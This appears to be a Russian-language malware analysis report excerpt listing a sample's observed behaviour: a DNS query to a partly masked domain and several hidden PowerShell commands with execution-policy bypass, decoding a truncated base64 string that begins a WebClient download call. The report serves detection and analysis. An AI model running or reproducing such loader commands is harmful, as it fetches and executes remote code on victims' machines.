Техническая информация
- '<SYSTEM32>\cmd.exe' /C powershell -ExecutionPolicy ByPass -windowstyle hidden -noprofile $b=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpL...
- DNS ASK hr###amond.com
- '<SYSTEM32>\cmd.exe' /C powershell -ExecutionPolicy ByPass -windowstyle hidden -noprofile $b=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpL...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -windowstyle hidden -noprofile $b=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRml...